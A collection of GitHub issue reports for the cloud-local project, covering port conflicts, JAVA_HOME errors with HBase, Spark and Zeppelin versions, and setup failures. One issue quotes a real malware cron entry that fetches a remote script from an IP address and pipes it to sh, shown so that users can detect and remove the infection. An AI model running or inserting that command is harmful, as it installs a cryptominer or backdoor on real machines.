ccri / cloud-local
Install script for a local 1 node cloud...no excuses folks
The pkgs folder works ok for an existing cloud-local, but scripting up bits on top of cloud-local could be improved by a more global storage place than a particular install. One's ~/.m2/repo seems like a good place. If necessary, we could even deploy com.ccri.cloud-local:xyz:v artifacts for the things we download from mirrors. But if there's a different package caching proposal, that's fine too.
Might as well just have one script, I think?
It'll be quite handy to be able to run several of these on the same machine, concurrently, so we'll have to de-conflict ports. A port-offset type variable would probably be the easiest, from a usability standpoint, and perfectly useful. If it's possible to set things up so that the cloud can be stopped, a function can be called to change the ports, and then the cloud is restarted and works on the new ports, that'd be awesome.
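The port-offset idea above could be sketched like this; the variable names are assumptions for illustration, not cloud-local's actual config:

```shell
# Sketch of a port-offset scheme (names are assumptions): every service
# port becomes base + offset, so two instances can run side by side.
PORT_OFFSET=100                                  # second instance shifts all ports by 100
ZOOKEEPER_PORT=$((2181 + PORT_OFFSET))           # 2281
ACCUMULO_MONITOR_PORT=$((50095 + PORT_OFFSET))   # 50195
echo "zookeeper=$ZOOKEEPER_PORT monitor=$ACCUMULO_MONITOR_PORT"
```

Restarting on new ports would then just be stop, change PORT_OFFSET, re-render configs, start.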
Recently I found that my servers running cloud-local were infected with the Kinsing malware injection. I still don't know exactly how it happened, but the following steps remove it:
Detect its appearance:
sudo grep CRON /var/log/syslog
Remove the injection via cron:
$ crontab -e
Remove the line: wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1
Set permissions so that no one (except root or special users) can write to /var/tmp or /tmp.
These are just the actions needed to remove it. The server is definitely compromised, so data will be impacted. If anyone knows more about it, please share.
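The cron cleanup can also be done non-interactively instead of via crontab -e. Demonstrated on a sample crontab here (the backup line is invented for the demo); against the real crontab the pipeline would be `crontab -l | grep -v '195\.3\.146\.118' | crontab -`:

```shell
# Sketch: filter the injected entry out of a crontab listing.
# The sample below stands in for the output of `crontab -l`.
sample='0 * * * * /usr/bin/backup
* * * * * wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1'
cleaned=$(printf '%s\n' "$sample" | grep -v '195\.3\.146\.118')
echo "$cleaned"   # only the harmless line remains
```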
A failed download dropped a 0-byte geomesa jar in ${ACCUMULO_HOME}/lib/ext.
In . pkg_geomesa-*, the vars were commented out.
2 issues here:
When I run the bin/cloud-local.sh init script, I am asked to log in to my own machine (which serves as the hbase master) and provide the password when it complains about JAVA_HOME not being set:
Starting hbase...
starting master, logging to /home/user/Documents/cloud-local/hbase-1.3.1/logs/hbase-user-master-ds-gpu11.out
OpenJDK 64-Bit Server VM warning: ignoring option PermSize=128m; support was removed in 8.0
OpenJDK 64-Bit Server VM warning: ignoring option MaxPermSize=128m; support was removed in 8.0
jb@ds-gpu11's password:
ds-gpu11: +======================================================================+
ds-gpu11: | Error: JAVA_HOME is not set |
ds-gpu11: +----------------------------------------------------------------------+
ds-gpu11: | Please download the latest Sun JDK from the Sun Java web site |
ds-gpu11: | > http://www.oracle.com/technetwork/java/javase/downloads |
ds-gpu11: | |
ds-gpu11: | HBase requires Java 1.7 or later. |
ds-gpu11: +======================================================================+
On my machine (the one used as the hbase master), a proper version of java is installed and JAVA_HOME is not empty:
(base) jb@ds-gpu11:~/Documents/cloud-local$ java --version
openjdk 11.0.8 2020-07-14
OpenJDK Runtime Environment (build 11.0.8+10-post-Ubuntu-0ubuntu118.04.1)
OpenJDK 64-Bit Server VM (build 11.0.8+10-post-Ubuntu-0ubuntu118.04.1, mixed mode, sharing)
(base) jb@ds-gpu11:~/Documents/cloud-local$ echo $JAVA_HOME
/usr/lib/jvm/java-8-openjdk-amd64
So it is not clear to me why I get this error.
The error comes from /cloud-local/hbase-1.3.1/bin/hbase-config.sh, where there is a check whether JAVA_HOME is defined.
I believe that JAVA_HOME can be set in the cloud-local/hbase-1.3.1/conf/hbase-env.sh file (as described in section 2.2.3 here: https://hbase.apache.org/book.html#quickstart), but this file is overwritten every time you run the cloud-local.sh init command, so I don't see how I can specify this.
If I copy the exact same part of the script where it fails, and run it directly on my machine, it does not fail as JAVA_HOME is indeed recognized.
Any clue how I can specify JAVA_HOME variable correctly?
Thanks!!
Extra info: I believe these are all the scripts that call each other:
1) script to initiate the cloud environment on the local node: /cloud-local/bin/cloud-local.sh init -->
2) calls the script to start hbase: /cloud-local/hbase-1.3.1/bin/start-hbase.sh -->
3) calls the script to start the daemon: "$bin"/hbase-daemon.sh --config "${HBASE_CONF_DIR}" start master $@
4) the daemon is started: ~/Documents/cloud-local/hbase-1.3.1/bin/hbase-daemon.sh
5) /cloud-local/hbase-1.3.1/bin/hbase-config.sh checks whether JAVA_HOME is defined, and that check fails.
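The password prompt in the log suggests start-hbase.sh is launching the daemon over ssh, and a non-interactive ssh session typically does not source the profile that exports JAVA_HOME in your terminal, which would explain why the same check passes when run by hand. Since init overwrites hbase-env.sh, one hedged workaround is to re-append the export after every init; the paths and JDK location below are assumptions taken from the log output, adjust to your install:

```shell
# Sketch of a workaround: re-add JAVA_HOME to hbase-env.sh after each
# cloud-local.sh init, since init overwrites that file.
CLOUD_HOME="$HOME/Documents/cloud-local"
HBASE_ENV="$CLOUD_HOME/hbase-1.3.1/conf/hbase-env.sh"
mkdir -p "$(dirname "$HBASE_ENV")"   # no-op on a real install
echo 'export JAVA_HOME=/usr/lib/jvm/java-8-openjdk-amd64' >> "$HBASE_ENV"
```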
Maybe warn? Maybe continue?
If having issues accessing the accumulo web interface on a headless node, do these 2 things:
# Should the monitor bind to all network interfaces -- default: false
export ACCUMULO_MONITOR_BIND_ALL="true"
Now go to http://127.0.0.1:50095 in your host's web browser and things should work.
@tkunicki knows where the archive site is
Not filtering to a particular user means that the stop message about killing processes looks like it'll kill more than it actually will.
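A minimal sketch of the user filter, so the preview matches what the stop command can actually kill (the java pattern is an assumption about what cloud-local greps for):

```shell
# Sketch: restrict the process listing to the current user.
me=$(id -un)
mine=$(pgrep -u "$me" -f java || true)   # empty when no java processes match
echo "java processes owned by $me: ${mine:-none}"
```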
check ports before startup/configure
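A pre-start check could look like this sketch; the port list is an assumption, and bash's /dev/tcp redirection is used so no extra tools are needed (the connect attempt fails when nothing is listening):

```shell
# Sketch: collect any already-bound ports before starting services.
busy=""
for port in 2181 9997 50095; do
  if (exec 3<>"/dev/tcp/127.0.0.1/$port") 2>/dev/null; then
    busy="$busy $port"
  fi
done
if [ -n "$busy" ]; then
  echo "Error: ports already taken:$busy" >&2
else
  echo "all ports free"
fi
```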
Cloud-local comes with Spark 2.2 (updated in e8b0ede#diff-06fa9e4b7ace9bf9ecc6510432619361 ) but Zeppelin 0.7.2 does not support Spark 2.2 as far as I can tell (Zeppelin displays an error message and this is confirmed by https://stackoverflow.com/questions/45789231/zeppelin-0-7-2-version-does-not-support-spark-2-2-0#45791664).
The current one (ibiblio) is really slow...but dependable...maybe use it as a fallback
See line 115 in 08f9901.
Put accumulo instance and password in config file to prevent prompt
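Something like the following could live in the config file; the variable names here are invented for illustration only (cloud-local's actual config keys may differ), and storing a password in a file carries the obvious caveats:

```shell
# Hypothetical config entries -- names are illustrative, not cloud-local's
# actual keys.
export CL_ACCUMULO_INSTANCE="local"
export CL_ACCUMULO_PASSWORD="secret"
```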
When invoking config.sh as part of cloud-local.sh, "exit 1" just ends the running script. But when sourcing it directly from the cli to set up environment variables, it closes the existing terminal window.
So you can run bin/cloud-local.sh status
I wonder if that is really hard
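It shouldn't be: a common bash idiom is to replace the bare exit 1 with a helper that returns when the script was sourced. This is a sketch, not cloud-local's current code:

```shell
# Sketch: abort without killing a shell that sourced the script.
# Inside the function, BASH_SOURCE[0] is the file that defined it; it only
# equals $0 when that file was executed rather than sourced.
fail() {
  echo "error: $1" >&2
  if [ "${BASH_SOURCE[0]}" != "$0" ]; then
    return 1   # sourced: hand control back to the interactive shell
  else
    exit 1     # executed: terminate the script as before
  fi
}
```

config.sh would then call something like `fail "port 2181 is already taken"` wherever it currently echoes and exits.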
This line in ports.sh looks like it's using the undefined variable origport when it should be using port.
It appears that many (all?) mirrors do not have hadoop 2.7.3 available.
It seems like it could be convenient to, instead of requiring the user to unset some collection of env vars by hand (e.g., CLOUD_HOME, HADOOP_HOME, etc), provide a command which unsets the ones that probably matter.
The following might be a reasonable start, and/or overkill:
unset ACCUMULO_HOME CLOUD_HOME HADOOP_COMMON_HOME HADOOP_HDFS_HOME HADOOP_HOME HADOOP_YARN_HOME KAFKA_HOME YARN_HOME ZOOKEEPER_HOME
Makes for a smaller download, and should still work with (most versions of) Hadoop.
Branch already started: spark_DL_w.o.Hadoop (currently at commit c01cf83).
This was @elahrvivaz 's idea while working on the f_withSpark branch.
If Spark is downloaded, then people can use the spark-submit script/class against Yarn without even needing to run the Spark service. Branch #f_withSpark has been started. Maybe a further feature would be running the Spark history service so the spark details can be viewed after jobs end.
Trying to build cloud-local for the first time, running ./bin/cloud-local.sh init. The packages for accumulo, hadoop, and zookeeper all save. When it tries to config hadoop I get the following errors:
mkdir: cannot create directory ‘/home/ccannon/devtools/cloud-local/hadoop-2.6.3/etc/hadoop’: File exists
mkdir: cannot create directory ‘/home/ccannon/devtools/cloud-local/zookeeper-3.4.6/conf’: File exists
Error: port 2181 is already taken
It seems that cloud-local now fails to deploy without $GEOSERVER_HOME set.
nothing complex...just make them vars (e.g. accumulo version is 1.6.4, hadoop is 2.6.3, etc)
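A minimal sketch of what that could look like; the versions come from the issue text, while the tarball naming is an assumption for illustration:

```shell
# Sketch: pull the pinned versions into variables.
ACCUMULO_VERSION="1.6.4"
HADOOP_VERSION="2.6.3"
ACCUMULO_TARBALL="accumulo-${ACCUMULO_VERSION}-bin.tar.gz"
HADOOP_TARBALL="hadoop-${HADOOP_VERSION}.tar.gz"
echo "$ACCUMULO_TARBALL $HADOOP_TARBALL"
```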